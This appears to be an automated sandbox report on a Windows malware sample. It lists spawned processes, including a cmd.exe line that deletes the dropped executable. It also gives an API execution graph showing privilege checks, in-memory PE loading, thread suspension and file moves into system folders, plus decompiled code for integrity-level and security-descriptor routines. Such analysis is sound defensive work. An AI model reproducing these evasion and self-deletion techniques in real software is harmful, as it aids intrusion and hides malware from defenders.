File size:22456 bytes
MD5 hash:B46BFD40F6379DB41AC99FF3103D81B9
Has administrator privileges:true
Programmed in:"C, C++ or other language
Reputation:low

General

Start time:21:56:14
Start date:19/11/2018
Path:C:\Users\user\AppData\Local\Temp\cnwog.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user~1\AppData\Local\Temp\cnwog.exe'
Imagebase:0xd30000
File size:22542 bytes
MD5 hash:658965F6B9EFC9114BA4EB2C7DBC85E8
Has administrator privileges:true
Programmed in:"C, C++ or other language
Reputation:low

General

Start time:21:56:14
Start date:19/11/2018
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c del C:\Users\user~1\AppData\Local\Temp\cnwog.exe >> NUL
Imagebase:0x4a5a0000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:true
Programmed in:"C, C++ or other language
Reputation:low

General

Start time:21:56:17
Start date:19/11/2018
Path:C:\Windows\system32\drivers\WudfPf.sys
Wow64 process (32bit):false
Commandline:unknown
Imagebase:0x440000
File size:66560 bytes
MD5 hash:06E6F32C8D0A3F66D956F57B43A2E070
Has administrator privileges:
Programmed in:"C, C++ or other language
Reputation:low

Disassembly

Code Analysis

Reset < >

    Execution Graph

    Execution Coverage:18.9%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:23%
    Total number of Nodes:309
    Total number of Limit Nodes:32

    Graph

    execution_graph 1385 db1fb2 IsBadReadPtr 1386 db1ff4 1385->1386 1391 db1fc4 1385->1391 1393 db1cda 1386->1393 1389 db1fe5 1427 db1e99 1389->1427 1391->1386 1391->1389 1446 db29c6 1393->1446 1395 db1ced _memset 1396 db1d01 GetVersionExA 1395->1396 1397 db1d2c 1396->1397 1398 db1d17 GetVersionExA 1396->1398 1400 db1d4d GetCommandLineA GetModuleHandleA 1397->1400 1401 db1d35 GetCurrentProcess 1397->1401 1398->1397 1399 db1e8f ExitProcess 1398->1399 1497 db2308 GetTickCount 1400->1497 1466 db289c 1401->1466 1405 db1d7e 1406 db1e8a 1405->1406 1408 db1d8f 1405->1408 1409 db1e7c 1405->1409 1564 db2481 1406->1564 1408->1409 1411 db1d98 IsUserAnAdmin 1408->1411 1484 db22dc 1409->1484 1411->1409 1413 db1da6 GetModuleHandleA GetModuleFileNameA 1411->1413 1508 db250c CreateFileA 1413->1508 1416 db1e3b 1418 db3e87 2 API calls 1416->1418 1421 db1e53 1418->1421 1419 db1e68 Sleep LocalFree 1419->1409 1420 db1dfe 1420->1419 1517 db3e87 1420->1517 1520 db3143 GetModuleHandleA GetSystemDirectoryA 1421->1520 1428 db1eac GetModuleHandleA GetModuleFileNameA GetCurrentProcessId 1427->1428 1442 db1f60 1427->1442 1433 db1ede 1428->1433 1429 db1f69 OpenEventA 1430 db1f8d GetLastError 1429->1430 1431 db1f7d SetEvent CloseHandle 1429->1431 1432 db1f93 1430->1432 1431->1432 1434 db27dd 2 API calls 1432->1434 1433->1429 1441 db1f18 1433->1441 1435 db1f98 1434->1435 1436 db1f9c GetCurrentProcessId 1435->1436 1445 db1f48 ExitProcess 1435->1445 1708 db2822 CreateToolhelp32Snapshot 1436->1708 1441->1442 1443 db1f35 GetCurrentProcess 1441->1443 1444 db289c 15 API calls 1443->1444 1444->1445 1568 db3510 1446->1568 1449 db29fa GetLastError 1451 db2a00 1449->1451 1450 db2a07 1452 db2aeb IsUserAnAdmin 1450->1452 1453 db2a1b GetCurrentProcess OpenProcessToken 1450->1453 1451->1395 1452->1451 1454 db2a39 GetTokenInformation 1453->1454 1455 db2ae1 GetLastError 1453->1455 1456 db2a68 1454->1456 1457 db2a57 GetLastError CloseHandle 1454->1457 1455->1451 1458 db2ad2 IsUserAnAdmin 1456->1458 1459 db2a74 GetTokenInformation 1456->1459 1457->1451 1460 db2ada CloseHandle 1458->1460 1459->1457 1461 db2a8c 1459->1461 1460->1451 1462 db2aa8 CheckTokenMembership 1461->1462 1463 db2ac5 GetLastError 1461->1463 1462->1463 1464 db2ac0 1462->1464 1465 db2acb CloseHandle 1463->1465 1464->1465 1465->1460 1467 db1d45 1466->1467 1468 db28bd _memset 1466->1468 1467->1399 1467->1400 1469 db28cf GetVersionExA 1468->1469 1470 db28fa 1469->1470 1471 db28e5 GetVersionExA 1469->1471 1470->1467 1472 db2904 OpenProcessToken 1470->1472 1471->1467 1471->1470 1473 db291b GetTokenInformation 1472->1473 1474 db29af GetLastError 1472->1474 1475 db299e GetLastError 1473->1475 1476 db2935 GetLastError 1473->1476 1474->1467 1477 db29a4 CloseHandle 1475->1477 1478 db299a GetLastError 1476->1478 1479 db2942 LocalAlloc 1476->1479 1477->1467 1478->1477 1479->1475 1480 db2953 GetTokenInformation 1479->1480 1481 db298b GetLastError 1480->1481 1482 db2966 GetSidSubAuthorityCount GetSidSubAuthority 1480->1482 1483 db2991 LocalFree 1481->1483 1482->1483 1483->1477 1570 db2291 1484->1570 1487 db22eb GetLastError CloseHandle 1488 db1e81 1487->1488 1488->1406 1489 db1434 IsUserAnAdmin 1488->1489 1490 db2291 25 API calls 1489->1490 1491 db1440 1490->1491 1492 db1463 1491->1492 1493 db1446 GetLastError 1491->1493 1492->1406 1494 db145d CloseHandle 1493->1494 1495 db1453 1493->1495 1494->1492 1601 db13d0 FindResourceA 1495->1601 1498 db231f 1497->1498 1499 db22dc 27 API calls 1498->1499 1500 db232c _memset 1499->1500 1501 db2349 GetVersionExA 1500->1501 1505 db2330 1500->1505 1502 db235f GetVersionExA 1501->1502 1503 db2370 1501->1503 1502->1503 1502->1505 1504 db2389 GetCommandLineW CommandLineToArgvW 1503->1504 1503->1505 1504->1505 1507 db23a9 1504->1507 1505->1405 1506 db2431 LocalFree 1506->1505 1507->1506 1509 db258c GetLastError 1508->1509 1510 db2533 GetFileSize LocalAlloc 1508->1510 1511 db1dd6 1509->1511 1512 db257a GetLastError 1510->1512 1513 db2553 ReadFile 1510->1513 1511->1409 1511->1416 1511->1420 1514 db2582 CloseHandle 1512->1514 1515 db2569 1513->1515 1516 db2572 GetLastError 1513->1516 1514->1511 1515->1514 1516->1514 1673 db203c 1517->1673 1519 db3e8c 1519->1519 1521 db318a 1520->1521 1522 db3197 GetTempPathA 1521->1522 1523 db31b8 1522->1523 1524 db31c5 GetTempPathA GetTickCount 1523->1524 1676 db3620 1524->1676 1527 db3216 GetCurrentProcess 1530 db3223 1527->1530 1528 db3248 GetClipboardFormatNameA 1528->1530 1529 db322d 1529->1419 1530->1528 1530->1529 1531 db32b1 1530->1531 1531->1529 1532 db250c 8 API calls 1531->1532 1533 db32da 1532->1533 1533->1529 1678 db2f02 1533->1678 1536 db335d 1539 db24aa 6 API calls 1536->1539 1537 db334b 1685 db24aa CreateFileA 1537->1685 1538 db3307 GetTempPathA GetTickCount 1540 db3620 _strlen 1538->1540 1542 db337a LocalFree 1539->1542 1543 db3329 wsprintfA MoveFileA 1540->1543 1542->1529 1545 db3394 1542->1545 1543->1537 1546 db3434 1545->1546 1692 db3065 1545->1692 1697 db27dd GetVersionExA 1546->1697 1550 db343d LockWorkStation 1552 db344c CreateEventA 1550->1552 1551 db3445 1700 db30cd SendInput SendInput SendInput SendInput 1551->1700 1554 db346b WaitForSingleObject 1552->1554 1555 db3463 GetLastError 1552->1555 1557 db347b 1554->1557 1558 db3482 CloseHandle GetTempPathA GetTickCount 1554->1558 1555->1529 1556 db33c7 GetClipboardFormatNameA 1560 db33a9 1556->1560 1557->1558 1559 db3620 _strlen 1558->1559 1561 db34ad wsprintfA MoveFileA CopyFileA 1559->1561 1560->1529 1560->1556 1562 db340f 1560->1562 1561->1529 1562->1546 1563 db3416 RegisterWindowMessageA 1562->1563 1563->1555 1563->1562 1565 db24a1 ExitProcess 1564->1565 1566 db248a 1564->1566 1566->1565 1701 db21ed GetModuleFileNameA 1566->1701 1569 db29e6 GetVersionExA 1568->1569 1569->1449 1569->1450 1571 db22a6 _memset 1570->1571 1577 db2604 AllocateAndInitializeSid 1571->1577 1574 db22bb CreateMutexA 1575 db22d7 1574->1575 1576 db22d1 GetLastError 1574->1576 1575->1487 1575->1488 1576->1575 1578 db263b _memset 1577->1578 1579 db27ce GetLastError 1577->1579 1580 db264a SetEntriesInAclA 1578->1580 1591 db22b7 1579->1591 1581 db27bd GetLastError 1580->1581 1582 db2686 LocalAlloc 1580->1582 1585 db27c3 FreeSid 1581->1585 1583 db26a3 _memset 1582->1583 1584 db27b0 GetLastError 1582->1584 1587 db26ac InitializeSecurityDescriptor 1583->1587 1586 db27b6 LocalFree 1584->1586 1585->1591 1586->1585 1588 db27a3 GetLastError LocalFree 1587->1588 1589 db26c2 SetSecurityDescriptorDacl 1587->1589 1588->1586 1589->1588 1590 db26d9 LoadLibraryA GetProcAddress 1589->1590 1590->1591 1592 db2704 LocalAlloc 1590->1592 1591->1574 1591->1575 1593 db2786 GetLastError 1592->1593 1594 db2714 InitializeAcl 1592->1594 1593->1591 1595 db2722 AllocateAndInitializeSid 1594->1595 1596 db2777 GetLastError 1594->1596 1595->1596 1597 db2745 1595->1597 1598 db277d LocalFree 1596->1598 1599 db2766 GetLastError FreeSid 1597->1599 1600 db2755 SetSecurityDescriptorSacl 1597->1600 1598->1591 1599->1598 1600->1591 1600->1599 1602 db13e2 LoadResource 1601->1602 1605 db142c 1601->1605 1603 db13ef LockResource 1602->1603 1602->1605 1610 db14f3 VirtualAlloc 1603->1610 1605->1494 1606 db1408 1606->1605 1611 db1a94 1606->1611 1610->1606 1612 db1426 1611->1612 1613 db1ab4 1611->1613 1627 db14d8 1612->1627 1613->1612 1614 db1ad2 VirtualAlloc 1613->1614 1615 db1b0c 1614->1615 1616 db1af4 VirtualAlloc 1614->1616 1615->1612 1630 db14f3 VirtualAlloc 1615->1630 1616->1615 1618 db1b20 VirtualAlloc VirtualAlloc 1619 db1b88 1618->1619 1631 db171c 1619->1631 1621 db1baf 1637 db1903 1621->1637 1625 db1bd4 1625->1612 1651 db1a23 1625->1651 1628 db14df VirtualFree 1627->1628 1629 db14f0 1627->1629 1628->1629 1629->1605 1630->1618 1632 db1742 1631->1632 1635 db17b8 1631->1635 1633 db177f VirtualAlloc 1632->1633 1634 db1762 VirtualAlloc 1632->1634 1632->1635 1633->1632 1636 db177d 1634->1636 1635->1621 1636->1632 1638 db1927 IsBadReadPtr 1637->1638 1643 db1a13 1637->1643 1641 db1941 1638->1641 1638->1643 1639 db1957 LoadLibraryA 1639->1641 1639->1643 1641->1639 1642 db19f8 IsBadReadPtr 1641->1642 1641->1643 1645 db19bf 1641->1645 1661 db1509 1641->1661 1642->1641 1642->1643 1643->1625 1646 db17bf 1643->1646 1644 db19cb GetProcAddress 1644->1645 1645->1641 1645->1644 1647 db187d 1646->1647 1649 db17e1 1646->1649 1647->1625 1648 db1804 VirtualFree 1648->1649 1649->1647 1649->1648 1650 db1852 VirtualProtect 1649->1650 1650->1647 1650->1649 1652 db1a8f 1651->1652 1654 db1a2f 1651->1654 1652->1612 1653 db1a6c 1659 db14d8 VirtualFree 1653->1659 1654->1653 1658 db1a5e FreeLibrary 1654->1658 1660 db1a74 1654->1660 1655 db1a89 1657 db14d8 VirtualFree 1655->1657 1656 db1a7c VirtualFree 1656->1655 1657->1652 1658->1654 1659->1660 1660->1655 1660->1656 1662 db151b 1661->1662 1663 db1515 1661->1663 1666 db1522 1662->1666 1672 db14f3 VirtualAlloc 1662->1672 1669 db14b2 1663->1669 1666->1641 1667 db1532 1667->1666 1668 db14d8 VirtualFree 1667->1668 1668->1666 1670 db14c2 VirtualQuery 1669->1670 1671 db14be 1669->1671 1670->1671 1671->1662 1672->1667 1674 db2061 1673->1674 1675 db2045 LoadLibraryA GetProcAddress 1673->1675 1674->1519 1675->1674 1677 db31e7 wsprintfA GetModuleHandleA GetProcAddress 1676->1677 1677->1527 1677->1530 1679 db2f21 1678->1679 1680 db2f67 1679->1680 1681 db2f8e GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 1679->1681 1680->1536 1680->1537 1680->1538 1682 db2fcd 1681->1682 1683 db300d CheckSumMappedFile 1682->1683 1683->1680 1684 db3055 GetLastError 1683->1684 1684->1680 1686 db24fe GetLastError 1685->1686 1687 db24cc WriteFile 1685->1687 1690 db2504 1686->1690 1688 db24e8 GetLastError 1687->1688 1689 db24e5 1687->1689 1691 db24ee FlushFileBuffers CloseHandle 1688->1691 1689->1691 1690->1536 1691->1690 1693 db307c 1692->1693 1694 db30a0 RegisterClassExA 1693->1694 1695 db30c0 1694->1695 1696 db30b2 UnregisterClassA 1694->1696 1695->1560 1696->1694 1696->1695 1698 db2818 GetLastError 1697->1698 1699 db2801 1697->1699 1698->1699 1699->1550 1699->1551 1700->1552 1702 db2288 1701->1702 1703 db2210 GetShortPathNameA 1701->1703 1702->1565 1703->1702 1704 db2223 1703->1704 1705 db3e87 2 API calls 1704->1705 1706 db223b GetEnvironmentVariableA 1705->1706 1706->1702 1707 db2255 lstrcatA lstrcatA WinExec 1706->1707 1707->1702 1709 db288e GetLastError 1708->1709 1710 db283e Process32First 1708->1710 1713 db1fa4 1709->1713 1711 db2859 1710->1711 1712 db287f GetLastError 1710->1712 1714 db2875 1711->1714 1715 db2864 Process32Next 1711->1715 1716 db2885 CloseHandle 1712->1716 1713->1445 1717 db1c33 CreateToolhelp32Snapshot 1713->1717 1714->1716 1715->1711 1715->1714 1716->1713 1718 db1c4f Thread32First 1717->1718 1719 db1ccc GetLastError 1717->1719 1721 db1cc0 GetLastError 1718->1721 1725 db1c75 1718->1725 1720 db1cd2 1719->1720 1720->1445 1722 db1cc6 CloseHandle 1721->1722 1722->1720 1723 db1caf Thread32Next 1723->1725 1726 db1cbd 1723->1726 1724 db1c8c OpenThread 1724->1723 1727 db1c9d SuspendThread 1724->1727 1725->1723 1725->1724 1726->1722 1728 db1ca9 1727->1728 1729 db1cac CloseHandle 1727->1729 1728->1729 1729->1723 1730 40126b 1732 401278 1730->1732 1733 40128a 1732->1733 1733->1733 1734 401293 VirtualAlloc 1733->1734 1734->1734 1735 4012aa CreateFileW 1734->1735 1737 401331 ReadFile lstrcmpW 1735->1737 1743 40140d 1735->1743 1739 401380 CreateFileW 1737->1739 1737->1743 1740 4013b6 WriteFile 1739->1740 1739->1743 1741 4013d3 ShellExecuteW ExitProcess 1740->1741 1748 db3c90 IsProcessorFeaturePresent 1757 db3e80 GetPEB 1744 40101d 1745 401026 GetComputerNameW 1744->1745 1747 4010d6 1745->1747 1749 db1bd6 1750 db1c25 1749->1750 1751 db1a23 3 API calls 1750->1751 1752 db1c2d 1751->1752

    Callgraph

    • Executed
    • Not Executed
    • Opacity -> Relevance
    • Disassembly available
    callgraph 0 Function_00DB1CDA 4 Function_00DB2BDC 0->4 5 Function_00DB22DC 0->5 17 Function_00DB3143 0->17 18 Function_00DB29C6 0->18 38 Function_00DB289C 0->38 45 Function_00DB3510 0->45 55 Function_00DB2308 0->55 58 Function_00DB250C 0->58 63 Function_00DB2481 0->63 65 Function_00DB3E87 0->65 80 Function_00DB1434 0->80 1 Function_00401141 2 Function_00DB14D8 3 Function_00DB27DD 21 Function_00DB2AF9 4->21 31 Function_00DB3A60 4->31 34 Function_00DB259B 4->34 4->58 61 Function_00DB2F02 4->61 81 Function_00DB24AA 4->81 85 Function_00DB3620 4->85 43 Function_00DB2291 5->43 6 Function_00DB1553 7 Function_00DB3A50 8 Function_00DB3B50 9 Function_00DB13D0 9->2 22 Function_00DB14F3 9->22 40 Function_00DB159C 9->40 49 Function_00DB1A94 9->49 67 Function_00DB1705 9->67 10 Function_00DB3A57 11 Function_0040114C 12 Function_00DB1BD6 83 Function_00DB1A23 12->83 13 Function_00DB25CB 13->85 14 Function_00DB20CE 14->45 15 Function_00DB30CD 16 Function_00DB214C 27 Function_00DB20EC 16->27 17->3 17->8 17->14 17->15 17->27 33 Function_00DB3065 17->33 50 Function_00DB2194 17->50 17->58 17->61 70 Function_00DB2104 17->70 17->81 17->85 18->45 19 Function_00DB38C5 20 Function_00401160 37 Function_00DB3E9D 21->37 42 Function_00DB3E92 21->42 21->45 23 Function_00DB3770 24 Function_0040126B 29 Function_00401278 24->29 25 Function_00DB38F4 26 Function_00DB21ED 26->65 28 Function_00DB396C 29->1 30 Function_00DB2062 32 Function_00DB1467 33->14 35 Function_00401001 36 Function_00DB1E99 36->3 36->13 36->38 46 Function_00DB3590 36->46 71 Function_00DB21BB 36->71 75 Function_00DB1C33 36->75 84 Function_00DB2822 36->84 56 Function_00DB2088 37->56 38->45 39 Function_00DB171C 39->32 53 Function_00DB1489 39->53 40->6 60 Function_00DB1583 40->60 41 Function_00DB391C 42->30 43->45 68 Function_00DB2604 43->68 44 Function_00DB3A11 47 Function_00DB3C90 48 Function_00DB3896 49->22 49->39 49->53 59 Function_00DB1903 49->59 69 Function_00DB1884 49->69 73 Function_00DB17BF 49->73 49->83 50->27 51 Function_00DB1C14 51->83 52 Function_00DB3794 54 Function_00DB1509 54->2 54->22 54->53 77 Function_00DB14B2 54->77 55->5 55->44 55->45 62 Function_00DB2001 55->62 57 Function_00DB2E88 59->54 60->6 61->14 61->16 61->27 61->50 82 Function_00DB20AE 61->82 63->26 64 Function_00DB3E80 74 Function_00DB203C 65->74 66 Function_0040101D 68->45 70->27 71->27 72 Function_00DB3738 76 Function_00DB1FB2 76->0 76->36 78 Function_00DB36B0 79 Function_00DB3DB5 80->9 80->43 83->2

    Executed Functions

    Control-flow Graph

    C-Code - Quality: 81%
    			E00DB2604(intOrPtr* _a4, void* _a8) {
    				void* _v8;
    				int _v12;
    				void* _v16;
    				_Unknown_base(*)()* _v20;
    				short _v24;
    				struct _SID_IDENTIFIER_AUTHORITY _v28;
    				short _v32;
    				struct _SID_IDENTIFIER_AUTHORITY _v36;
    				void* _v40;
    				intOrPtr _v44;
    				int _v48;
    				int _v60;
    				long _v64;
    				char _v68;
    				char* _t49;
    				void* _t52;
    				_Unknown_base(*)()* _t61;
    				intOrPtr* _t62;
    				struct _ACL* _t65;
    				struct _ACL* _t82;
    
    				_v28.Value = 0;
    				_v24 = 0x100;
    				_v16 = 0;
    				if(AllocateAndInitializeSid( &_v28, 1, 0, 0, 0, 0, 0, 0, 0, 0,  &_v16) == 0) {
    					GetLastError();
    					L22:
    					return 0;
    				}
    				_v12 = 0;
    				E00DB3510( &_v68, 0, 0x20);
    				_v68 = _a8;
    				_v40 = _v16;
    				_t49 =  &_v68;
    				_v64 = 2;
    				_v60 = 0;
    				_v48 = 0;
    				_v44 = 5;
    				__imp__SetEntriesInAclA(1, _t49, 0,  &_v12); // executed
    				if(_t49 != 0) {
    					GetLastError();
    					L20:
    					FreeSid(_v16);
    					goto L22;
    				}
    				_t52 = LocalAlloc(0x40, 0x14);
    				_a8 = _t52;
    				if(_t52 == 0) {
    					GetLastError();
    					L18:
    					LocalFree(_v12);
    					goto L20;
    				}
    				E00DB3510(_t52, 0, 0x14);
    				if(InitializeSecurityDescriptor(_a8, 1) == 0 || SetSecurityDescriptorDacl(_a8, 1, _v12, 0) == 0) {
    					GetLastError();
    					LocalFree(_a8);
    					goto L18;
    				} else {
    					_v36.Value = 0;
    					_v32 = 0x1000;
    					_t61 = GetProcAddress(LoadLibraryA("advapi32.dll"), "AddMandatoryAce");
    					_v20 = _t61;
    					if(_t61 == 0) {
    						L15:
    						_t62 = _a4;
    						 *_t62 = 0xc;
    						 *((intOrPtr*)(_t62 + 4)) = _a8;
    						 *((intOrPtr*)(_t62 + 8)) = 0;
    						return 1;
    					}
    					_t65 = LocalAlloc(0x40, 0x200); // executed
    					_t82 = _t65;
    					if(_t82 == 0) {
    						GetLastError();
    						goto L15;
    					}
    					if(InitializeAcl(_t82, 0x200, 2) == 0) {
    						L12:
    						GetLastError();
    						L13:
    						LocalFree(_t82);
    						goto L15;
    					}
    					_v8 = 0;
    					if(AllocateAndInitializeSid( &_v36, 1, 0x1000, 0, 0, 0, 0, 0, 0, 0,  &_v8) == 0) {
    						goto L12;
    					}
    					_push(_v8);
    					_push(1);
    					_push(0);
    					_push(2);
    					_push(_t82);
    					if(_v20() == 0 || SetSecurityDescriptorSacl(_a8, 1, _t82, 0) == 0) {
    						GetLastError();
    						FreeSid(_v8);
    						goto L13;
    					} else {
    						goto L15;
    					}
    				}
    			}























    0x00db2621
    0x00db2624
    0x00db262a
    0x00db2635
    0x00db27ce
    0x00db27d4
    0x00000000
    0x00db27d4
    0x00db2642
    0x00db2645
    0x00db264d
    0x00db2656
    0x00db265e
    0x00db2664
    0x00db266b
    0x00db266e
    0x00db2671
    0x00db2678
    0x00db2680
    0x00db27bd
    0x00db27c3
    0x00db27c6
    0x00000000
    0x00db27c6
    0x00db2690
    0x00db2698
    0x00db269d
    0x00db27b0
    0x00db27b6
    0x00db27b9
    0x00000000
    0x00db27b9
    0x00db26a7
    0x00db26bc
    0x00db27a3
    0x00db27ac
    0x00000000
    0x00db26d9
    0x00db26e3
    0x00db26e6
    0x00db26f3
    0x00db26f9
    0x00db26fe
    0x00db278c
    0x00db278c
    0x00db2792
    0x00db2798
    0x00db279b
    0x00000000
    0x00db27a0
    0x00db270c
    0x00db270e
    0x00db2712
    0x00db2786
    0x00000000
    0x00db2786
    0x00db2720
    0x00db2777
    0x00db2777
    0x00db277d
    0x00db277e
    0x00000000
    0x00db277e
    0x00db2738
    0x00db2743
    0x00000000
    0x00000000
    0x00db2745
    0x00db2748
    0x00db274a
    0x00db274b
    0x00db274d
    0x00db2753
    0x00db2766
    0x00db276f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00db2753

    APIs
    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00DB22B7,00000000,00000000,00000000), ref: 00DB262D
    • _memset.LIBCMT ref: 00DB2645
    • SetEntriesInAclA.ADVAPI32(00000001,?,00000000,7622DAA3), ref: 00DB2678
    • LocalAlloc.KERNEL32(00000040,00000014), ref: 00DB2690
    • _memset.LIBCMT ref: 00DB26A7
    • InitializeSecurityDescriptor.ADVAPI32(00DB22B7,00000001), ref: 00DB26B4
    • SetSecurityDescriptorDacl.ADVAPI32(00DB22B7,00000001,7622DAA3,00000000), ref: 00DB26CB
    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00DB26EC
    • GetProcAddress.KERNEL32(00000000), ref: 00DB26F3
    • LocalAlloc.KERNELBASE(00000040,00000200), ref: 00DB270C
    • InitializeAcl.ADVAPI32(00000000,00000200,00000002), ref: 00DB2718
    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00001000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,001F0001), ref: 00DB273B
    • SetSecurityDescriptorSacl.ADVAPI32(00DB22B7,00000001,00000000,00000000), ref: 00DB275C
    • GetLastError.KERNEL32 ref: 00DB2766
    • FreeSid.ADVAPI32(001F0001), ref: 00DB276F
    • GetLastError.KERNEL32 ref: 00DB2777
    • LocalFree.KERNEL32(00000000), ref: 00DB277E
    • GetLastError.KERNEL32 ref: 00DB2786
    • GetLastError.KERNEL32 ref: 00DB27A3
    • LocalFree.KERNEL32(00DB22B7), ref: 00DB27AC
    • GetLastError.KERNEL32 ref: 00DB27B0
    • LocalFree.KERNEL32(7622DAA3), ref: 00DB27B9
    • GetLastError.KERNEL32 ref: 00DB27BD
    • FreeSid.ADVAPI32(00DB22B7), ref: 00DB27C6
    • GetLastError.KERNEL32 ref: 00DB27CE
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: ErrorLast$FreeLocal$Initialize$DescriptorSecurity$AllocAllocate_memset$AddressDaclEntriesLibraryLoadProcSacl
    • String ID: AddMandatoryAce$advapi32.dll
    • API String ID: 922488538-673174713
    • Opcode ID: 84f50193a46be12225560f717c9638f85b5f2bbf65bff16593b934253c732d6c
    • Instruction ID: d1148eeccfd7e811d6b4de4258ef52868568ae8caaae441a06b23762137c464f
    • Opcode Fuzzy Hash: 84f50193a46be12225560f717c9638f85b5f2bbf65bff16593b934253c732d6c
    • Instruction Fuzzy Hash: 37514C76900309EFDB10AFA5DC89AEE7BB8FF08741F544129F606E6290DB7489408B75
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 70%
    			E00DB29C6() {
    				int _t32;
    				int _t39;
    				void* _t47;
    				void* _t51;
    				int _t57;
    				void* _t63;
    				void* _t65;
    
    				_t63 = _t65 - 0x78;
    				_t57 = 0;
    				E00DB3510(_t63 - 0x3c, 0, 0x9c);
    				 *(_t63 - 0x3c) = 0x9c;
    				_t32 = GetVersionExA(_t63 - 0x3c);
    				if(_t32 != 0) {
    					if( *((intOrPtr*)(_t63 - 0x2c)) != 2 ||  *((intOrPtr*)(_t63 - 0x38)) < 6) {
    						__imp__#680();
    					} else {
    						 *(_t63 + 0x74) = 0;
    						if(OpenProcessToken(GetCurrentProcess(), 8, _t63 + 0x74) == 0) {
    							GetLastError();
    							goto L18;
    						} else {
    							 *(_t63 + 0x68) = 0;
    							_t39 = GetTokenInformation( *(_t63 + 0x74), 0x12, _t63 + 0x60, 4, _t63 + 0x68); // executed
    							if(_t39 != 0) {
    								if( *(_t63 + 0x60) != 3) {
    									__imp__#680();
    									_t57 = _t39;
    									goto L16;
    								} else {
    									 *(_t63 + 0x70) = 0;
    									if(GetTokenInformation( *(_t63 + 0x74), 0x13, _t63 + 0x70, 4, _t63 + 0x68) == 0) {
    										goto L7;
    									} else {
    										_t47 = _t63 - 0x80;
    										 *((intOrPtr*)(_t63 + 0x64)) = 0x44;
    										__imp__CreateWellKnownSid(0x1a, 0, _t47, _t63 + 0x64);
    										if(_t47 == 0) {
    											L13:
    											GetLastError();
    										} else {
    											_t51 = _t63 - 0x80;
    											 *(_t63 + 0x6c) = 0;
    											__imp__CheckTokenMembership( *(_t63 + 0x70), _t51, _t63 + 0x6c);
    											if(_t51 == 0) {
    												goto L13;
    											} else {
    												_t57 =  *(_t63 + 0x6c);
    											}
    										}
    										CloseHandle( *(_t63 + 0x70));
    										L16:
    										CloseHandle( *(_t63 + 0x74));
    										L18:
    										_t32 = _t57;
    									}
    								}
    							} else {
    								L7:
    								GetLastError();
    								CloseHandle( *(_t63 + 0x74));
    								goto L2;
    							}
    						}
    					}
    				} else {
    					GetLastError();
    					L2:
    					_t32 = 0;
    				}
    				return _t32;
    			}










    0x00db29c7
    0x00db29da
    0x00db29e1
    0x00db29ed
    0x00db29f0
    0x00db29f8
    0x00db2a0b
    0x00db2aeb
    0x00db2a1b
    0x00db2a21
    0x00db2a33
    0x00db2ae1
    0x00000000
    0x00db2a39
    0x00db2a4e
    0x00db2a51
    0x00db2a55
    0x00db2a72
    0x00db2ad2
    0x00db2ad8
    0x00000000
    0x00db2a74
    0x00db2a83
    0x00db2a8a
    0x00000000
    0x00db2a8c
    0x00db2a90
    0x00db2a97
    0x00db2a9e
    0x00db2aa6
    0x00db2ac5
    0x00db2ac5
    0x00db2aa8
    0x00db2aac
    0x00db2ab3
    0x00db2ab6
    0x00db2abe
    0x00000000
    0x00db2ac0
    0x00db2ac0
    0x00db2ac0
    0x00db2abe
    0x00db2ace
    0x00db2ada
    0x00db2add
    0x00db2ae7
    0x00db2ae7
    0x00db2ae7
    0x00db2a8a
    0x00db2a57
    0x00db2a57
    0x00db2a57
    0x00db2a60
    0x00000000
    0x00db2a60
    0x00db2a55
    0x00db2a33
    0x00db29fa
    0x00db29fa
    0x00db2a00
    0x00db2a00
    0x00db2a00
    0x00db2af8

    APIs
    • _memset.LIBCMT ref: 00DB29E1
    • GetVersionExA.KERNEL32(?,?,?), ref: 00DB29F0
    • GetLastError.KERNEL32(?,?), ref: 00DB29FA
    • GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00DB2A24
    • OpenProcessToken.ADVAPI32(00000000,?,?), ref: 00DB2A2B
    • GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?,?,?), ref: 00DB2A51
    • GetLastError.KERNEL32(?,?), ref: 00DB2A57
    • CloseHandle.KERNEL32(?), ref: 00DB2A60
    • GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,?), ref: 00DB2A86
    • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?,?,?), ref: 00DB2A9E
    • CheckTokenMembership.ADVAPI32(?,?,?,?,?), ref: 00DB2AB6
    • GetLastError.KERNEL32(?,?), ref: 00DB2AC5
    • CloseHandle.KERNEL32(?), ref: 00DB2ACE
    • IsUserAnAdmin.SHELL32 ref: 00DB2AD2
    • CloseHandle.KERNEL32(?), ref: 00DB2ADD
    • GetLastError.KERNEL32(?,?), ref: 00DB2AE1
    • IsUserAnAdmin.SHELL32 ref: 00DB2AEB
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: ErrorLastToken$CloseHandle$AdminInformationProcessUser$CheckCreateCurrentKnownMembershipOpenVersionWell_memset
